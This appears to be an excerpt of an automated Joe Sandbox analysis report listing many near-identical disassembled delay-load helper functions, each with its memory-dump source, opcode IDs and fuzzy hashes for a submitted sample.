                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 36701a87e034736137f5b981bbb86bd9b99806b2a92a2ccb6125ffa34e7a2d5a
                                                                                                                        • Instruction ID: ad29215ade6ad8b982ed3492636e11dceb495de7356029280f2aa56612841645
                                                                                                                        • Opcode Fuzzy Hash: 36701a87e034736137f5b981bbb86bd9b99806b2a92a2ccb6125ffa34e7a2d5a
                                                                                                                        • Instruction Fuzzy Hash: 85B012D135B140AC310851151D43D37114DC5CBB10330B03EFC09F8280D844BC010431
                                                                                                                        Function 00EAE250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 759d1b40a7d5900475070112981479d9e272eb2f7aec3d8568c4b7ba324d5fff
                                                                                                                        • Instruction ID: d99bdf10235473fe82d9f0d56dc3f7136f068f24b3fab2b5dee8934981f00d5b
                                                                                                                        • Opcode Fuzzy Hash: 759d1b40a7d5900475070112981479d9e272eb2f7aec3d8568c4b7ba324d5fff
                                                                                                                        • Instruction Fuzzy Hash: 76B012E135B240BC314852151D43D37014DC5CAB10330713EF809F8280D8457C450431
                                                                                                                        Function 00EAE228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: bd6901ddad57a00995992a971afa7855bad5c8950c0cab625be6ecca8b4c31cb
                                                                                                                        • Instruction ID: 7ced4af6fc1432a680cf7779ce749d2c0e10e65a5504dcd74155e8a3678945e8
                                                                                                                        • Opcode Fuzzy Hash: bd6901ddad57a00995992a971afa7855bad5c8950c0cab625be6ecca8b4c31cb
                                                                                                                        • Instruction Fuzzy Hash: DAB012E125A200BC314851155D43D37014CC5CBF10330B13EF809F8280D8457D410431
                                                                                                                        Function 00EAE23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 26fd1d87d2fe6adb9f6c89fbba75835597f5a5fc4b24cedcb6f39e421ef76464
                                                                                                                        • Instruction ID: 9f87c106a5f2bc50638d2f799eb5b59c546ee065a1560f32068fe998a3608757
                                                                                                                        • Opcode Fuzzy Hash: 26fd1d87d2fe6adb9f6c89fbba75835597f5a5fc4b24cedcb6f39e421ef76464
                                                                                                                        • Instruction Fuzzy Hash: BDB012E125A100AC310851165D43D37014CC5CBF10330B03EF809F8280D8447D010431
                                                                                                                        Function 00EAE232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 739eedc6ea3dd2d5310e773e0b255fc4f1698f964c7673fea671c5588a9ed5b9
                                                                                                                        • Instruction ID: a405c5ecc677d91277092d262db682cfbe1eb401ad43e837342f35a5b1841822
                                                                                                                        • Opcode Fuzzy Hash: 739eedc6ea3dd2d5310e773e0b255fc4f1698f964c7673fea671c5588a9ed5b9
                                                                                                                        • Instruction Fuzzy Hash: 71B012E125A100AC310851155E43D37014CC5CBF10330B03EF809F8284DC457E020431
                                                                                                                        Function 00EAE20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 5ffe75160f08eb46212d18455628dbdd6eb047387a011d9e0e50898fe405f347
                                                                                                                        • Instruction ID: 60933a01f875fc9dea81b6c30dc0e25324041a2b0bb95360720667a6e9f2234a
                                                                                                                        • Opcode Fuzzy Hash: 5ffe75160f08eb46212d18455628dbdd6eb047387a011d9e0e50898fe405f347
                                                                                                                        • Instruction Fuzzy Hash: 7DB012D125A100AC314852151E43D37014CC5CAB10330B13EF80DF8380DC557D0A0431
                                                                                                                        Function 00EAE200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: a00912889378ca85572dcf6e73c4c3e740ddaddcd5a64be65de634f5a8d08199
                                                                                                                        • Instruction ID: 7c0a745db97f1bd984b544625da7db9abd82b66a251aeafefed185e5cd644c49
                                                                                                                        • Opcode Fuzzy Hash: a00912889378ca85572dcf6e73c4c3e740ddaddcd5a64be65de634f5a8d08199
                                                                                                                        • Instruction Fuzzy Hash: 17B012D135A240BC318852151D43D37014CC5CAB10330B23EF80DF8380D8447C450431
                                                                                                                        Function 00EAE21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: b37f94d72b740654401f1a34e1872592debce070f8f04e01b69f84fe98e679d2
                                                                                                                        • Instruction ID: 5c815ffdf0b8c85bbc515038e8e567ffa2232c06e3c4afe8d086687f304c8bfc
                                                                                                                        • Opcode Fuzzy Hash: b37f94d72b740654401f1a34e1872592debce070f8f04e01b69f84fe98e679d2
                                                                                                                        • Instruction Fuzzy Hash: A1B012E125A100BC310851155D43D37014CC5CBF10330F03FFC09F8280D844BD010431
                                                                                                                        Function 00EAE5A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE580
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: Fjun
                                                                                                                        • API String ID: 1269201914-1717936292
                                                                                                                        • Opcode ID: e86a635f253105e09992088e6403f14ab949d40f585d4226092f378562bc3939
                                                                                                                        • Instruction ID: c75d305d73d8db5627d04b18732e51fad6affd318ca20e8c776f27841895b9b6
                                                                                                                        • Opcode Fuzzy Hash: e86a635f253105e09992088e6403f14ab949d40f585d4226092f378562bc3939
                                                                                                                        • Instruction Fuzzy Hash: 4AB012C1A592007C310C51646F03D37015CC1CAF14374762EF408F9280EC412D120531
                                                                                                                        Function 00EAE5B1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE580
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: Fjun
                                                                                                                        • API String ID: 1269201914-1717936292
                                                                                                                        • Opcode ID: 480493f444bce47e36ba352c6b7f421421eb407b986e72e2e43cc666e47e5e2c
                                                                                                                        • Instruction ID: 729a51088c568d693bf724ad8fbfaf45fbd6412418f548c91eab4dc37bda60cf
                                                                                                                        • Opcode Fuzzy Hash: 480493f444bce47e36ba352c6b7f421421eb407b986e72e2e43cc666e47e5e2c
                                                                                                                        • Instruction Fuzzy Hash: 15B012C1A593007C314C51646E03D37015CC1CAF14334762EF408F9280E8402C410531
                                                                                                                        Function 00EAE593 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE580
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: Fjun
                                                                                                                        • API String ID: 1269201914-1717936292
                                                                                                                        • Opcode ID: 2fcb004a739b6c1a82af95ce4d1257d733045a9e1a67591f88eb7859fcf1b447
                                                                                                                        • Instruction ID: 48c639da85db0d1cdc355734cfe0533197714f825515bf321fd7c6aa759aa053
                                                                                                                        • Opcode Fuzzy Hash: 2fcb004a739b6c1a82af95ce4d1257d733045a9e1a67591f88eb7859fcf1b447
                                                                                                                        • Instruction Fuzzy Hash: 5FB012C1A592047D320C51642E03D37014CD1CAF14330742EF408F96C0E8402D010531
                                                                                                                        Function 00EAE546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE51F
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<
                                                                                                                        • API String ID: 1269201914-576538559
                                                                                                                        • Opcode ID: 233fe15aab6f69fc9aae8055e8e3502e5912d8573b8d9bb4e8378dff5f0b7012
                                                                                                                        • Instruction ID: 89ec0fe758a7ec59485f0ea33416baad7ad27dfa3b48bdc00df82cfe563f0ab6
                                                                                                                        • Opcode Fuzzy Hash: 233fe15aab6f69fc9aae8055e8e3502e5912d8573b8d9bb4e8378dff5f0b7012
                                                                                                                        • Instruction Fuzzy Hash: 16B012C1A582007C320861186E03D3F054DC1CBF14370722FF408F8280EC402C450431
                                                                                                                        Function 00EAE50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE51F
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<
                                                                                                                        • API String ID: 1269201914-576538559
                                                                                                                        • Opcode ID: e019fb2a1ac38a81aed955ea3ec02d0570d51ec6bad5fbc2188ac957e91e44e0
                                                                                                                        • Instruction ID: c0125510b6aba163492ce518bda004608386584a37743e50a43e09f56464d9e5
                                                                                                                        • Opcode Fuzzy Hash: e019fb2a1ac38a81aed955ea3ec02d0570d51ec6bad5fbc2188ac957e91e44e0
                                                                                                                        • Instruction Fuzzy Hash: E5B012C1A591007C310821342E07D3F010EC1C7F14330703FF414F8681BC406D050431
                                                                                                                        Function 00EAE2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
